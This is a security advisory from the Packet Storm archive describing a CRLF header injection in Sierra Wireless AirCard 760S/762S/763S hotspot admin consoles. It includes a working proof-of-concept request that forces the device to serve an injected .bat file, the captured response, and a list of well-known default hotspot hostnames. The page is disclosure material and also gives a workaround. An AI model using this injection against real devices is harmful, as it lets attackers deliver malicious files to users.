what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection

Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection
Posted Jan 14, 2015
Authored by Luke Walker

Sierra Wireless produces a mobile wi-fi hotspot device that is popular amongst telecommunication companies for re-branding to suit local markets. The AirCard 760S/762S/763S Web-based Administrative Console suffers from a HTTP header injection that allows an attacker to inject a file into the HTTP response from the device.

tags | exploit, web, local, file inclusion
SHA-256 | ded2a0627c3a429a64de38ac35a2932ed3eba1561ee7e5b46f1a77886f913fdd

Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection

Change Mirror Download
Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection

[*] Overview

Sierra Wireless produces a mobile wi-fi hotspot device that is popular
amongst telecommunication companies for re-branding to suit local markets.

The AirCard 760S/762S/763S Web-based Administrative Console suffers from a
HTTP header injection that allows an attacker to inject a file into the
HTTP response from the device.

[*] Description

The configuration export function allows the name of the exported
configuration file to be customised, but the parameter "save" is not
filtered.

http://​<routerURL>/export.cfg?save=export.cfg


[*] Traffic sample from POC

(curl -L)
(sample below tested on firmware SWI9200H2_03.05.11.00AP)

> GET /export.cfg?save=
> export.bat%0d%0aContent-type:%20application/bat%0d%0a%0d%0apause%0d%0a
> &sessionId=00000001%2DhYL4H
> 4jC125ApaZyFCHePwPINyFUdYf HTTP/1.1
> > User-Agent: curl/7.40.0
> > Host: router.4g
> > Accept: */*
> >
> < HTTP/1.1 200 OK
> < Server: httpd/2.7 (sierra; D4C)
> < Date: Mon, 12 Jan 2015 05:32:38 GMT
> < Connection: keep-alive
> < Cache-Control: no-cache
> < Content-Disposition: attachment; filename=export.bat
> < Content-type: application/bat
>
> pause


> Content-type: application/octet-stream
> Transfer-encoding: chunked
> 3a
> #
> # Configuration export from Telstra WI-FI 4G
> #
> # Model:


[*] Limitations

While it does not require authentication, it does require user interaction
and knowledge of the hotspot's hostname.

However, the default hotspot names are well-known, based on the OEM'd
version of the AirCard Mobile Hotspot:

* 763S - Sierra Wireless Original OEM - http://aircard.hotspot
* 763S - Rogers Rocket Mobile Hotspot - http://rogers.hotspot
* 762S - DNA 4G WLAN Mokkula - http://dna.mokkula
* 760S - Telstra Mobile WiFi 4G - http://telstra.4g
* 760S - BigPond Mobile - http://bigpond.4g

[*] Workaround

Change the name and IP address of the device to something other than the
default settings.

[*] Vendor Contact

An attempt to contact both Sierra Wireless and NETGEAR (who seem to own
support of the device now) was unsuccessful.

​regards
,
Luke


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close